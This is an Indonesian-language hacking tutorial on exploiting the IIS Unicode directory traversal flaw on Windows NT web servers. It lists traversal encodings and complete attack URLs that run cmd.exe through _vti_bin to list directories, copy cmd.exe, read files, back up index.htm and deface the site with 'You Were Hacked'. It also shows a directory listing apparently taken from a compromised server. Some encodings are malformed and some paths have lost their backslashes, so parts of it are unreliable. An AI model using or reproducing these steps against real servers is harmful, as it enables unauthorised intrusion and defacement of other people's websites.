Judul : TUTORIAL UNICODE

Judul : TUTORIAL UNICODE
Oleh : r3v0lt
Reader : Private!!!
Just only crew ————————————————
Target : http://www.target.loe
Login : ada beberapa contoh login diantaranya :
a) _vti_bin
b) cgi-bin
c) scripts
d) msadc Unicode :
Tentukan dari yang hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita masukin
a) ..%c1%1c..
b) ..%c0%9v..
c) ..%c0%af..
d) ..%c0%qf..
e) ..%c1%8s..
f) ..%e0%80%af..
g) ..%c1%9c..
h) ..%c1%pc..
OS target : WinNT dan Win98 0xB5 ISO 8859-1 0xC5 ISO 8859-1 0xEA CP437 0x2140 JIS X 0208 0x22 ISO 8859-1 Secara
umum : http://target/login/unicode/os/system/c+dir http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
jika sudah bisa dimasukin lo bisa liat file seperti ini
Directory of c:Backup_siteHarini_Site 10/05/2001 19:56
. 10/05/2001 19:56
.. 08/05/2001 10:23
230 cmd.exe 24/04/2001 04:33
4.620 1home.htm 05/10/2000 12:40 668
about.htm 10/05/2001 19:54
AboutUs 11/05/2001 10:28 131
about_us.htm 28/10/2000 14:49
4.911 about_us.old.htm
Sekarang lo copy file cmd.exe dengan nama baru cmd1.exe dengan mengganti ‘/c+dir+c:’ menjadi ‘/c+copy+c:’ (tanpa petik) lalu
ditambahkan dengan : winntsystem32cmd.exe+c:cmd1.exe
sehingga kita dapatkan : http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:cmd1.exe
sekarang kamu bisa liat file cmd1.exe udah ada di direktori : http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../cmd1.exe?/c+dir+c:\
Cari halaman index ke http://www.target.com/blah.ida Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path. Kalo trik .ida tidak bekerja,
coba gunakan direktori InetPub : http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../cmd1.exe?/c+dir+c:inetpub
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../cmd1.exe?/c+dir+c:inetpubwwwroot http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../cmd1.exe?/c+dir+c:inetpubwwwrootindex.htm
Lalu kita backup halaman tersebut dengan : http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../cmd1.exe?/c+copy+c:inetpubwwwrootindex.htm+c:inetpubwwwrootindex.htm.bak
Lalu kita deface halamannya dengan melakukan hal ini : http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../cmd1.exe?/c+echo+You%20Were%20Hacked+>+c:inetpubwwwrootindex.htm /c+echo+You%20Were%20Hacked+>+c:
>>> adalah untuk menuliskan kata-kata You Were Hacked pada c:inetpubwwwrootindex.htm dengan %20 merupakan tanda spasi Membaca file yang lain dengan menggunakan
perintah ‘type’ : http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../cmd1.exe?/c+type+c:inetpubwwwrootindex.htm